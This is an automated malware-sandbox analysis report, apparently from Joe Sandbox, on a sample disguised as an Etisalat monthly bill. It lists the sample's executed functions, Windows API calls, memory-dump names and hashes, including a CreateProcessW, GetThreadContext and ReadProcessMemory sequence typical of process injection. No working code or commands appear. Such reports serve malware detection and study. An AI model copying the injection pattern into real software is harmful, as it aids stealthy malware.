Function 008AB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008ABB4E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: ddf996d414d0c8897c9173a5d0ae7ff6a77604b7c98c055a679025d1a5f938a4
Instruction ID: 3121087360a287a53d4b5d03fb38de5773366e9b11edc364478a128d17cd6975
Opcode Fuzzy Hash: ddf996d414d0c8897c9173a5d0ae7ff6a77604b7c98c055a679025d1a5f938a4
Instruction Fuzzy Hash: BC32AB31A0420DDFEB20CF68C894ABAB7B5FF46354F188059EA05EB752D774AD81CB91

Function 01F4129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01F41A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F41AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F41B13

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction ID: a89f78215361301824db65e9fcdcba71d364f8d64a30ead77cf89e18dc51e98c
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: 2912CE24E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A5F81CB5A

Function 008A4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008A4EDD,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4E9C
Part of subcall function 008A4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008A4EAE
Part of subcall function 008A4E90: FreeLibrary.KERNEL32(00000000,?,?,008A4EDD,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4EFD

Part of subcall function 008A4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E3CDE,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4E62
Part of subcall function 008A4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008A4E74
Part of subcall function 008A4E59: FreeLibrary.KERNEL32(00000000,?,?,008E3CDE,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4E87

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 3ff9d0d2d1efe583f98d0f1bc7d16aaaf185bfc199d1592e09e11df841dd2a48
Instruction ID: 84ba239294e38345d6c9d51afe7ad75790c1b065bc6fdd9abbe3a7baa57f2e00
Opcode Fuzzy Hash: 3ff9d0d2d1efe583f98d0f1bc7d16aaaf185bfc199d1592e09e11df841dd2a48
Instruction Fuzzy Hash: 7C110132610205AAEF10AB68D802FAD77A4FF81B10F20942DF452E65C1EEB0EE549B52

Function 008D8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 008D8440

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b5b8377b6b5a7d1952eae7a37ccf93db223b52ac9b462b5bf4e513d9808f3e36
Instruction ID: a202974ee1fd9e2073df72748336ec5eed1420351a644ce7b86d77a23a76d586
Opcode Fuzzy Hash: b5b8377b6b5a7d1952eae7a37ccf93db223b52ac9b462b5bf4e513d9808f3e36
Instruction Fuzzy Hash: 2411067590410AEFCF05DF58E941A9A7BF9FF49314F10415AF808EB312DA31EA118BA5

Function 008A9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,008A543F,?,00010000,00000000,00000000,00000000,00000000), ref: 008A9A9C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8dd07acaff1da21b6d0abafefbc800942ba12dc34e181993ce235ef114deb5a4
Instruction ID: 9279561653d2ab73d2ccd8c7af521943944f07274c412d160eb5550c73e45ea3
Opcode Fuzzy Hash: 8dd07acaff1da21b6d0abafefbc800942ba12dc34e181993ce235ef114deb5a4
Instruction Fuzzy Hash: 97113632208B159FE7208E19C880B66B7E9FB45764F10C42EE9DBCAA51C770B945DB60

Function 008D5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008D4C7D: RtlAllocateHeap.NTDLL(00000008,008A1129,00000000,?,008D2E29,00000001,00000364,?,?,?,008CF2DE,008D3863,00971444,?,008BFDF5,?), ref: 008D4CBE

_free.LIBCMT ref: 008D506C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: 11bfbb45f235386c2ab8dbd240aed79b56f8a3732df6cd371cd678f3f8f67cbb
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: 29012672204B046BE321CE699881A5AFBEDFB89370F25061FE184C3380EA30AC05C6B5

Function 008CE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: 17bf0c624508e8695c9fe6bb14d8a107d6b8874f88645e47c5d7a132950afbcf
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: A1F0D132521A14A7D6313A7D9C05F5A37ACFF72334F10072EF421D22D2DA74E801C6A6

Function 008D4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,008A1129,00000000,?,008D2E29,00000001,00000364,?,?,?,008CF2DE,008D3863,00971444,?,008BFDF5,?), ref: 008D4CBE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a233b905661469658735fa0e9bc096fe32d45613cbfc8f8cdd1ddfc2dde59d85
Instruction ID: 4ed82e906b34fd9ad764945383db1f83d8b376dae4a4465ea54c9fbf592878f5
Opcode Fuzzy Hash: a233b905661469658735fa0e9bc096fe32d45613cbfc8f8cdd1ddfc2dde59d85
Instruction Fuzzy Hash: 49F0593122622467DB202F669C05F5A3798FF403B0B04A317F809EA380CBB0D80096E0

Function 008D3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00971444,?,008BFDF5,?,?,008AA976,00000010,00971440,008A13FC,?,008A13C6,?,008A1129), ref: 008D3852

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 111691db35c2b24a74c02d94fb0be7b593d275b2663e8d464caa11a153b57b9f
Instruction ID: bf5b873ef48edf59926a9145dfdcac60a15a3fd139297befaa38078846b31b6d
Opcode Fuzzy Hash: 111691db35c2b24a74c02d94fb0be7b593d275b2663e8d464caa11a153b57b9f
Instruction Fuzzy Hash: 64E0E53110422457E621266A9C00F9A375AFB427B0F090236BC14D6791CBA0DE01B2E3

Function 008D4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008D4D9C

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: f31479a643a3b0b347c86020eea7dd7dd84df5ac08e87d07be443f7eabbbba6d
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: B1E092361003059F8720CF6CD400A82BBF5FF94320720862AE89DE3310D331E812CB80

Function 008A4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4F6D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d5e25d328a72cac2f824a48472265501fdffe2871a1caee1dd5da2576a2ae77f
Instruction ID: c9a47f692c0b8ca48bc107d1a729fad3e5acd55582d93f5cbd43af256301ac6f
Opcode Fuzzy Hash: d5e25d328a72cac2f824a48472265501fdffe2871a1caee1dd5da2576a2ae77f
Instruction Fuzzy Hash: A5F01C71105751CFEB349F64D490812B7E4FF55319320B96EE1DAC2A11CBB19844EF51

Function 008A2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A2DC4

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: d227b82c201a68b97fadabb98253d0e9b347f2d7af84886c011e00be0a70d53e
Instruction ID: 318f00777a2e192c3099bf043fdc6cc54e6e9f2204b8e78dcbfdc104e2772490
Opcode Fuzzy Hash: d227b82c201a68b97fadabb98253d0e9b347f2d7af84886c011e00be0a70d53e
Instruction Fuzzy Hash: D4E0CD726041245BCB11925C9C05FDA77DDEFC9790F040071FD09E7248D970ED808691

Function 00912693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009126B5

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: bac64bf44b454bc8b240ff971a500ceee895f52345979a36b243e19335abf096
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 0DE04FB0609B005FDF396B28A851BF677E8DF49340F00086EF6ABC2252E57268958A4D

Function 008A2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008A3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008A3908

Part of subcall function 008AD730: GetInputState.USER32 ref: 008AD807

SetCurrentDirectoryW.KERNEL32(?), ref: 008A2B6B

Part of subcall function 008A30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008A314E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 80249c83884c6241db41b48e7c1c2b977e6b07c9d8445abb93a06823579bb9fb
Instruction ID: 79c08903131ea6acc092a9f1eb21e9816c2cc0cd8f2e210da7e170ee4dce9d35
Opcode Fuzzy Hash: 80249c83884c6241db41b48e7c1c2b977e6b07c9d8445abb93a06823579bb9fb
Instruction Fuzzy Hash: 06E0262230820407E608BB3CA81247DA349FBD3351F00143EF047C3972CE2445454313

Function 008E039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,008E0704,?,?,00000000,?,008E0704,00000000,0000000C), ref: 008E03B7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8b6a8a04179ce557dd97d449ad1fdf7b20494da15997cfb99d6aef954fa11254
Instruction ID: 5807395c72c428752dc90111eadc4526b9d397182d3b7fdeb30c00eb1d420fdb
Opcode Fuzzy Hash: 8b6a8a04179ce557dd97d449ad1fdf7b20494da15997cfb99d6aef954fa11254
Instruction Fuzzy Hash: 48D06C3205410DBBDF028F84DD06EDA3BAAFB48714F014000BE1866020C732E821AB90

Function 008A1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008A1CBC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 6113cdf4cadb2ad2667b5ff74f451267730438d6219f2145437aed5de76b3507
Instruction ID: 3112bf99af7940860b43e9068efc9648c24182018aaf42995164260ec926076d
Opcode Fuzzy Hash: 6113cdf4cadb2ad2667b5ff74f451267730438d6219f2145437aed5de76b3507
Instruction Fuzzy Hash: ECC048372A8304ABE2148B94AC4AF107764A348B00F048001F64DA96E383A228A0BA60

Function 0091744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 008A5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008A949C,?,00008000), ref: 008A5773

GetLastError.KERNEL32(00000002,00000000), ref: 009176DE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 80370b0b2bbac2577b117e155c7e3e4d88343217ec69182cebbdcb70154e36a1
Instruction ID: c1d37199cf72cb00d565274b8dcf722351ac647d567ced529ee773a65a12131b
Opcode Fuzzy Hash: 80370b0b2bbac2577b117e155c7e3e4d88343217ec69182cebbdcb70154e36a1
Instruction Fuzzy Hash: 55819E306087069FDB14EF68C491AA9B7F5FF89350F08451CF8869B692DB34AD85CB53

Function 008BFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 008BFD1F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: bfb4eee2879cd77f1f4f6c19ce5b14f4f8e7818d7f8d0a7c75155749ed8a9c4e
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5131E475A0010ADBD718CF59D890AA9FBA5FF49304B2886A5E909CF756D731EEC1CBC0

Function 01F422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01F422B1

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: abc60eeb53ff3a74dff3c3f3d40ae3f7c4bdebf85a11c8cbf676d76099ce4c39
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 24E0E67494010EDFDB00EFB8D54969E7FB4EF04301F100161FD01D2281D6319E508A72

Non-executed Functions

Function 00939576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0093961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0093965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0093969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009396C9
SendMessageW.USER32 ref: 009396F2
GetKeyState.USER32(00000011), ref: 0093978B
GetKeyState.USER32(00000009), ref: 00939798
